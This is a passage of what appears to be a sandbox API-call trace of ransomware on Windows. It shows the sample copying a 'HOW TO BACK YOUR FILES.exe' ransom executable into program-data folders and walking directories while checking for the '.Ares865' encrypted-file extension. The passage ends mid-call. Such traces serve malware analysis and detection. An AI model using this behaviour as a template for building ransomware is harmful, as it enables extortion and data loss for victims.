lpString2="C:\\Users\\All Users\\Application Data\\Oracle", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Oracle") returned="C:\\Users\\All Users\\Application Data\\Oracle" [0090.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Oracle" | out: lpString1="C:\\Users\\All Users\\Application Data\\Oracle") returned="C:\\Users\\All Users\\Application Data\\Oracle" [0090.098] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.098] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Oracle\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\oracle\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.098] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.099] GetLastError () returned 0x0 [0090.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.099] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.099] CloseHandle (hObject=0x120) returned 1 [0090.099] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.099] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Oracle\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.099] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.099] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.099] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Mozilla") returned="C:\\Users\\All Users\\Application Data\\Mozilla" [0090.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Mozilla" | out: lpString1="C:\\Users\\All Users\\Application Data\\Mozilla") returned="C:\\Users\\All Users\\Application Data\\Mozilla" [0090.100] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.100] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.100] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.100] GetLastError () returned 0x0 [0090.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.100] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.100] CloseHandle (hObject=0x120) returned 1 [0090.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.101] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.101] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.101] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.101] lstrcpyW (in: lpString1=0x2cce458, lpString2="logs" | out: lpString1="logs") returned="logs" [0090.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4780 [0090.101] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.101] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0090.101] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.101] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0090.101] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Mozilla\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Mozilla\\logs") returned="C:\\Users\\All Users\\Application Data\\Mozilla\\logs" [0090.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Mozilla\\logs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Mozilla\\logs") returned="C:\\Users\\All Users\\Application Data\\Mozilla\\logs" [0090.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Mozilla\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\mozilla\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.102] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.102] GetLastError () returned 0x0 [0090.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.102] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.102] CloseHandle (hObject=0x120) returned 1 [0090.103] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Mozilla\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.103] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.103] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.103] lstrcpyW (in: lpString1=0x2cce462, lpString2="maintenanceservice-install.log.Ares865" | out: lpString1="maintenanceservice-install.log.Ares865") returned="maintenanceservice-install.log.Ares865" [0090.103] lstrlenW (lpString="maintenanceservice-install.log.Ares865") returned 38 [0090.103] lstrlenW (lpString="Ares865") returned 7 [0090.103] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.103] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x632b4320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log.Ares865", cAlternateFileName="MAINTE~1.ARE")) returned 0 [0090.103] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.103] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0090.103] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft Help") returned="C:\\Users\\All Users\\Application Data\\Microsoft Help" [0090.103] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft Help") returned="C:\\Users\\All Users\\Application Data\\Microsoft Help" [0090.103] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.103] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.104] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.104] GetLastError () returned 0x0 [0090.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.104] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.104] CloseHandle (hObject=0x120) returned 1 [0090.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.104] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x635adea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635adea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.105] lstrcpyW (in: lpString1=0x2cce466, lpString2="Hx.hxn.Ares865" | out: lpString1="Hx.hxn.Ares865") returned="Hx.hxn.Ares865" [0090.105] lstrlenW (lpString="Hx.hxn.Ares865") returned 14 [0090.105] lstrlenW (lpString="Ares865") returned 7 [0090.105] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.105] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63326740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn.Ares865", cAlternateFileName="MSEXCE~1.ARE")) returned 1 [0090.105] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.105] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.105] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.EXCEL.14.1033.hxn.Ares865" | out: lpString1="MS.EXCEL.14.1033.hxn.Ares865") returned="MS.EXCEL.14.1033.hxn.Ares865" [0090.105] lstrlenW (lpString="MS.EXCEL.14.1033.hxn.Ares865") returned 28 [0090.105] lstrlenW (lpString="Ares865") returned 7 [0090.106] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.106] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63326740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSEXCE~2.ARE")) returned 1 [0090.106] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.106] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.106] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.EXCEL.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865") returned="MS.EXCEL.DEV.14.1033.hxn.Ares865" [0090.106] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn.Ares865") returned 32 [0090.106] lstrlenW (lpString="Ares865") returned 7 [0090.106] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.106] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6334c8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn.Ares865", cAlternateFileName="MSGRAP~1.ARE")) returned 1 [0090.106] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.106] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.106] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.GRAPH.14.1033.hxn.Ares865" | out: lpString1="MS.GRAPH.14.1033.hxn.Ares865") returned="MS.GRAPH.14.1033.hxn.Ares865" [0090.106] lstrlenW (lpString="MS.GRAPH.14.1033.hxn.Ares865") returned 28 [0090.106] lstrlenW (lpString="Ares865") returned 7 [0090.106] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.106] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63372a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn.Ares865", cAlternateFileName="MSGROO~1.ARE")) returned 1 [0090.106] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.106] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.106] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.GROOVE.14.1033.hxn.Ares865" | out: lpString1="MS.GROOVE.14.1033.hxn.Ares865") returned="MS.GROOVE.14.1033.hxn.Ares865" [0090.106] lstrlenW (lpString="MS.GROOVE.14.1033.hxn.Ares865") returned 29 [0090.106] lstrlenW (lpString="Ares865") returned 7 [0090.106] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.106] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x633becc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn.Ares865", cAlternateFileName="MSINFO~1.ARE")) returned 1 [0090.106] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.106] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.106] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.INFOPATH.14.1033.hxn.Ares865" | out: lpString1="MS.INFOPATH.14.1033.hxn.Ares865") returned="MS.INFOPATH.14.1033.hxn.Ares865" [0090.106] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn.Ares865") returned 31 [0090.107] lstrlenW (lpString="Ares865") returned 7 [0090.107] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.107] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x633becc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn.Ares865", cAlternateFileName="MSINFO~2.ARE")) returned 1 [0090.107] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.107] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.107] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.INFOPATHEDITOR.14.1033.hxn.Ares865" | out: lpString1="MS.INFOPATHEDITOR.14.1033.hxn.Ares865") returned="MS.INFOPATHEDITOR.14.1033.hxn.Ares865" [0090.107] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn.Ares865") returned 37 [0090.107] lstrlenW (lpString="Ares865") returned 7 [0090.107] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.107] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x633e4e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn.Ares865", cAlternateFileName="MSMSAC~1.ARE")) returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.107] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.MSACCESS.14.1033.hxn.Ares865" | out: lpString1="MS.MSACCESS.14.1033.hxn.Ares865") returned="MS.MSACCESS.14.1033.hxn.Ares865" [0090.107] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn.Ares865") returned 31 [0090.107] lstrlenW (lpString="Ares865") returned 7 [0090.107] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.107] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x633e4e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSMSAC~2.ARE")) returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSACCESS.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.107] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.MSACCESS.DEV.14.1033.hxn.Ares865" | out: lpString1="MS.MSACCESS.DEV.14.1033.hxn.Ares865") returned="MS.MSACCESS.DEV.14.1033.hxn.Ares865" [0090.107] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn.Ares865") returned 35 [0090.107] lstrlenW (lpString="Ares865") returned 7 [0090.107] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.107] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6340af80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn.Ares865", cAlternateFileName="MSMSOU~1.ARE")) returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.107] lstrcmpiW (lpString1="MS.MSOUC.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.107] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.MSOUC.14.1033.hxn.Ares865" | out: lpString1="MS.MSOUC.14.1033.hxn.Ares865") returned="MS.MSOUC.14.1033.hxn.Ares865" [0090.107] lstrlenW (lpString="MS.MSOUC.14.1033.hxn.Ares865") returned 28 [0090.108] lstrlenW (lpString="Ares865") returned 7 [0090.108] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.108] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6340af80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn.Ares865", cAlternateFileName="MSMSPU~1.ARE")) returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.108] lstrcpyW (in: lpString1=0x2cce466, lpString2="MS.MSPUB.14.1033.hxn.Ares865" | out: lpString1="MS.MSPUB.14.1033.hxn.Ares865") returned="MS.MSPUB.14.1033.hxn.Ares865" [0090.108] lstrlenW (lpString="MS.MSPUB.14.1033.hxn.Ares865") returned 28 [0090.108] lstrlenW (lpString="Ares865") returned 7 [0090.108] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.108] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x634310e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSMSPU~2.ARE")) returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.108] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0090.108] lstrcpyW (in: lpString1=0x2cce466, 